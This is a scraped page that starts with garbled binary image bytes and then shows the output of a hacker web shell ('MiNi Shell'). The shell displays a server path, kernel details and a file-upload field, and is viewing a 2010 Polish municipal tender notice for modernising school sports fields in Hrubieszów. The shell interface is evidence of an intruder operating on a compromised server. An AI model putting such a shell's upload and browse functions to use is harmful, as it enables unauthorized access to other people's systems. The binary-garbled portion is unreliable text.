JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100729/202817-N-2010.html

<p class="kh_header"><b>Hrubieszów: Przebudowa (modernizacja)  kompleksu boisk sportowych  przy  Szkole Podstawowej Nr 1 
ul. Listopadowa 12 w Hrubieszowie</b><br>
<b>Numer ogłoszenia: 202817 - 2010; data zamieszczenia: 29.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hrubieszów , ul. mjr H. Dobrzańskiego "Hubala" 1, 22-500 Hrubieszów, woj. lubelskie, tel. 084 6962380 w. 54, faks 084 6962380.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.hrubieszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa (modernizacja)  kompleksu boisk sportowych  przy  Szkole Podstawowej Nr 1 
ul. Listopadowa 12 w Hrubieszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: przebudowa (modernizacja)  kompleksu boisk sportowych zlokalizowanych na działce nr ew. 768 przy  Szkole Podstawowej Nr 1 -  ul. Listopadowej w Hrubieszowie. Powierzchnia działki szkoły w granicach własności wynosi 12414 m2  
     = 1,24 ha. 
W zakres wykonania wchodzi: 
1.Bieżnia 6-torowa o długości 60 m - symbol B  i skocznia w dal  symbol Sd usytuowane   wzdłuż południowej granicy działki o nawierzchni poliuretanowej i powierzchni 645m.
2.Plac zabaw dla dzieci z nauczania zintegrowanego - symbol Pz  usytuowany bezpośrednio za budynkiem głównym szkoły podstawowej a projektowaną bieżnią w miejscu wg. projektu planu zagospodarowania, o powierzchni około 715 m2, całkowicie ogrodzony, z dwiema furtkami, o nawierzchni poliuretanowej pod urządzeniami do zabaw w strefach bezpieczeństwa, pozostałe powierzchnie trawiaste. Wyposażenie placu zabaw w urządzenia zabawowe, ławki i śmietniki podano w legendzie do projektu planu zagospodarowania terenu.
3.Boisko do siatkówki - symbol Bs istniejące, usytuowane pomiędzy bieżnią a budynkiem
szkoły o wymiarach płyty 24,0 m x 15,5 m o nawierzchni asfaltowej i powierzchni około 372 m2 i boisku o wymiarach 18,0 m x 9,0 m, będzie użytkowane do czasu rozbudowy istniejącej sali gimnastycznej.
4.Rzutnia kulą -  symbol Rk  usytuowana pomiędzy salą gimnastyczną a boiskiem
wielofunkcyjnym o powierzchni terenu około 30 m, na którym usytuowano koło do pchnięcia kulą o średnicy 213,5 cm, o powierzchni betonowej, koło otoczone płaskownikiem ze stali nierdzewnej o gr. 6,0 mm i wysokości 76 mm od strony pola rzutów próg drewniany gr. 1,22 m i wysokości 102 mm, pole rzutów trawiaste o długości 12 m.
5.Skocznia w wzwyż  - symbol Sw  usytuowana pomiędzy salą gimnastyczną a boiskiem
wielofunkcyjnym o powierzchni terenu około 50 m2, na którym usytuowano rozbieg o nawierzchni poliuretanowej i zeskoczni piaskowej w obudowie o wymiarach 3,5 m x 3,5 m, powierzchnie obok trawiaste,
6.Boisko wielofunkcyjne - symbol Bw  usytuowane obok bieżni o wymiarach płyty 44,0 m
x 24,0 m o nawierzchni poliuretanowej o powierzchni 1056 m2, na płycie rozmieszczono 2 boiska do koszykówki o wymiarach 22,0 m x 15,0 m każde, jedno boisko do piłki ręcznej 40,0 m x 20,0 m oraz boisko do piłki siatkowej o wymiarach 18,0 m x 9,0 m, boiska zabezpieczone piłkochwytem o wysokości 6,0 m.
7.Boisko wielofunkcyjne - symbol  Bw usytuowane obok kortu tenisowego o wymiarach
płyty 44,0 m x 26,5 m o nawierzchni poliuretanowej o powierzchni 1166 m2, na płycie rozmieszczono 2 boiska do koszykówki o wymiarach 22,0 m x 15,0 m każde, jedno boisko do piłki ręcznej 40,0 m x 20,0 m oraz boisko do piłki siatkowej o wymiarach 18,0 m x 9,0 m, boiska zabezpieczone piłkochwytem o wysokości 6,0 m.
8.Rezerwa terenu pod kort tenisowy o powierzchni 1080 m2 do czasu budowy kortu
    tenisowego będzie użytkowana jako plac ćwiczeń o nawierzchni trawiastej.
9.Plac ćwiczeń - symbol Pl  usytuowany pomiędzy boiskiem wielofunkcyjnym a istniejącą
szkołą, utwardzony kostką brukową na podbudowie z chudego betonu przenoszącej nacisk 10 ton na oś samochodu o powierzchni około 2277m2 Na placu ćwiczeń przy boisku wielofunkcyjnym ustawić ławki w miejscu wg projektu planu zagospodarowania .
10.Plac gospodarczy -  symbol Pg  o nawierzchni z kostki brukowej na istniejącej
podbudowie bitumicznej o powierzchni ok.650m2. Na placu gospodarczym pełniącym również rolę parkingu ustawić kontener na śmieci i wydzielić dwa stanowiska postojowe dla samochodów inwalidzkich o wymiarach 3,60x5,0m każdy, kontener i stanowiska postojowe w miejscach wg projektu planu zagospodarowania.
11.Budowa systemu monitoringu wizyjnego boisk przyszkolnych w oparciu o instalację wewnątrz budynku okablowania, montaż kamer zewnętrznych na ścianach budynków szkoły oraz wyposażenie pomieszczenia monitoringu w niezbędny sprzęt.
W ramach zadania projektuje się montaż i uruchomienie następujących urządzeń:
1. Kamera zewnętrzna z wymiennym obiektywem w obudowie z uchwytem i termostatem 
     - 7  szt.
2. Rejestrator cyfrowy 16-to kanałowy z dyskiem 1TB - 1 szt.
3. Zasilacz awaryjny UPS - 1 szt.
4. Monitor 21 - 1 szt.
5. Zasilacz kamer z dystrybutorem - 1 szt.
6. Zasilacz termostatów z dystrybutorem - 1 szt.
12.Przyłącza kanalizacji deszczowej. Przyłącza odprowadzać będą wody opadowe i roztopowe z terenu boisk oraz części dachów szkoły. Wody opadowe z powierzchni utwardzonych odprowadzane będą poprzez odwodnienie liniowe a następnie wprowadzone do kanalizacji deszczowej. Odprowadzenie wód opadowych, zgodnie z warunkami technicznymi do istniejącej kanalizacji deszczowej. Przyłącza  z rur PCV 110, 160, 200, 250, 315, 400 SDR 34 klasy SN8 łączonych na uszczelki gumowe. Rurociągi  na podsypce piaskowej gr. 10cm. w gruncie odwodnionym. Studzienki rewizyjne kanalizacji deszczowej z kręgów betonowych z włazem żeliwnym lub jako systemowe. Wpusty uliczne  z kręgów betonowych z osadnikiem oraz włazem żeliwnym klasy D400. Kręgi betonowe studni zabezpieczone antykorozyjnie od zewnątrz środkami bitumicznymi. Włazy należy wyregulować do poziomu i nachylenia nawierzchni. Przejścia rur przez ścianki studzienek rewizyjnych  w tulejach krótkich szczelnych na uszczelki gumowe.
13.Odwodnienie boisk. Odwodnienie powierzchniowe - system odwodnień liniowych montowany wzdłuż dłuższych krawędzi boisk. Zastosować odwodnienia liniowe ACO Multiline. Korytka systemowe z polimerobetonu układane na podbudowie betonowej. Odprowadzenie wody poprzez skrzynki odpływowe. Przykrycie - ruszty w poprzeczne mostki ze stali ocynkowanej z mocowaniem śrubowym, klasa obciążenia A15. Podbudowa ogrodzenia i krawężniki - nie może utrudniać odpływu wody do odwodnienia, lub alternatywnie wykonać przerwy do odprowadzania wody. Odprowadzenie wód z pozostałych powierzchni utwardzonych na trawniki.
14.Oświetlenie terenu. Oświetlenie terenu boisk sportowych przy Szkole Podstawowej nr 1 przy ul. Listopadowej 12 w Hrubieszowie, wykonać w sposób podany w części graficznej opracowania. Na terenie boisk sportowych wzdłuż ogrodzenia rozstawić słupy oświetleniowe w miejscach wskazanych na rys. nr 1. Oświetlenie zaprojektowano oprawami typu - OUSb 100 z wysokoprężnymi lampami sodowymi SON-T-PLUS-100 W, zamontowanymi na wysięgnikach w = 1/lmb, stalowych słupów oświetleniowych rurowych typu S70SRwP Rzeszów. Oprawy zasilić przewodami YKSY 3x2.5mm2 lkV wciągniętymi w otwory słupów. We wnękach słupów stalowych stosować. Słupy oświetleniowe S70SRwP ustawić na typowych fundamentach betonowych F-150 dostarczonych razem ze słupami przez producenta słupów. Oprawy oświetleniowe zasilić przewodami YKSY 3x2.5mm2 lkV wciągniętymi w otwory słupów. We wnękach słupów stalowych stosować tabliczki bezpiecznikowe ZG5-95 z zabezpieczeniami S301-B6A. Słupy zasilane kablem YKY 5xl0mm2 - lkV z projektowanej dwuobwodowej szafki dla oświetlenia całonocnego i północnego typu SO-2C+P zasilonej z istniejącej tablicy głównej TG-p w budynku Szkoły
15.Chodniki z kostki brukowej betonowej kolorowej grubości 6 cm na podsypce  
      cementowo-piaskowej z wypełnieniem spoin piaskiem m2 395.520
16.Chodniki z kostki brukowej betonowej szarej grubości 6 cm na podsypce cementowo-
     piaskowej z wypełnieniem spoin piaskiem m2  2044.200
17. Wykonanie trawników dywanowych siewem na gruncie kat.III z nawożeniem 1031.00   
      m2
18. Nawierzchnia powlekana natryskowo (mata gumowa wykonana na budowie +granulat  
      EPDM gr 13 mm boiska wielofunkcyjne, bieżnia, rozbieżnia skoku w dal  - 3158.46 m2
19. Nawierzchnie z mieszanek mineralno-bitumicznych - 3158.46 m2
20.Ogrodzenie z siatki na słupkach z kształtowników o rozstawie wys. 3.0 m , 244.00 m

2. Zakres robót określają załączone przedmiary robót:   -   Załącznik  nr 2 oraz dokumentacja  
    budowlano-wykonawcza wraz ze SIWiORB   -  Załącznik nr 10.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.20-4, 45.31.11.00-1, 45.23.13.00-8, 45.23.14.00-9, 45.31.43.10-7, 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości  50.000 zł. (słownie: pięćdziesiąt tysięcy )
2.Wadium należy wnieść w terminie do dnia 19.08.10 do godz. 09.00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga posiadania niezbędnej wiedzy i doświadczenia tj. w okresie ostatnich pięciu lat, a jeżeli okres działalności jest krótszy w tym okresie,  wykonania minimum jednej roboty odpowiadającej rodzajem robotom będącym przedmiotem zamówienia. Za roboty odpowiadające robotom stanowiącym przedmiot zamówienia, Zamawiający  uzna  roboty otwartych obiektów sportowo-rekreacyjnych (boisk, stadionów, bieżni) o wartości minimum 1.000.000,00 zł. 
W ramach wykonanych obiektów wykonawca musi wykazać się wykonaniem minimum jednego boiska do piłki siatkowej, ręcznej, bieżni -  wraz z odwodnieniem i oświetleniem terenu.        
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów: 
1.	wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania osobami zdolnymi do wykonania zamówienia tj. dysponowania  co najmniej po  jednej osobie posiadającej  uprawnienia budowlane  w zakresie kierowania robotami drogowymi, robotami elektrycznymi i sanitarnymi.
Warunek zostanie spełniony po przedłożeniu wykazu i oświadczenia jn:

1. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie:  robotami budowlanymi w specjalności drogowej, kierowanie robotami sanitarnymi w specjalności instalacyjnej w zakresie sieci oraz  instalacji, kierowanie robotami elektrycznymi w  specjalności instalacyjnej w zakresie sieci oraz instalacji   urządzeń elektrycznych,   wpisanych na listę członków Okręgowej Izby Inżynierów Budownictwa wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
2. oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień 
Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca znajdował się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - na potwierdzenie czego należy przedstawić informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na łączną kwotę co najmniej  300.000  zł, dokumenty nie mogą być wystawione wcześniej niż 3 miesiące przed upływem terminu składania ofert,  opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej 
     w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.


Ocena spełnienia tego warunku dokonana będzie przez Zamawiającego na podstawie złożonych przez Wykonawców dokumentów i oświadczeń, z których jednoznacznie musi wynikać, iż ww. warunki wykonawca spełnił, stosując formułę: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz oferty, stanowiący załącznik nr 1  do  SIWZ
2.	kosztorysy ofertowe - (branża budowlano- drogowa, branża elektryczna, branża sanitarna, monitoring ) - załączniki nr 2 
3.	dokumenty i oświadczenia, o których mowa w części IX SIWZ, 
4.	w przypadku udziału podwykonawców - załącznik nr 6
5.	pisemne zobowiązanie innych  podmiotów do oddania wykonawcy  do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia- jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Z Wykonawcą, którego oferta zostanie uznana przez Zamawiającego za ofertę najkorzystniejszą, zostanie podpisana umowa. Wzór umowy stanowi Załącznik nr 3 do SIWZ.
2. Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian:
    - Kwota wynagrodzenia brutto może ulec zmianie w przypadku ustawowej zmiany obowiązującej  
      stawki VAT o wielkość    wynikającą ze zmiany stawki. 
    - Termin zakończenia robót budowlanych może ulec zmianie z powodu niekorzystnych warunków  
      atmosferycznych  (takich jak intensywne opady deszczu, silny wiatr) zamawiający może  
       przedłużyć termin wykonania umowy o czas  niezbędny do wykonania zamówienia uwzględniając  
      tylko dni niekorzystne.
   - Zamawiający może zawiesić wykonanie umowy na okoliczność wniesienia odwołania
   - Zamawiający może przedłużyć termin wykonania robót budowlanych o czas niezbędny do   
     rozpatrzenia odwołania, jeżeli  wystąpi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.hrubieszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Hrubieszowie - Wydział Gospodarki Mieniem Komunalnym i Ochrony Środowiska  ul. 3-go Maja 15 tel. 084 6962380 w. 56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2010 godzina 09:00, miejsce: Oferty należy dostarczyć do siedziby Zamawiającego( sekretariat), bądź przesłać na poniższy adres Zamawiającego:Gmina Miejska Hrubieszów
ul. Mjr H. Dobrzańskiego Hubala 1,  22-500 Hrubieszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com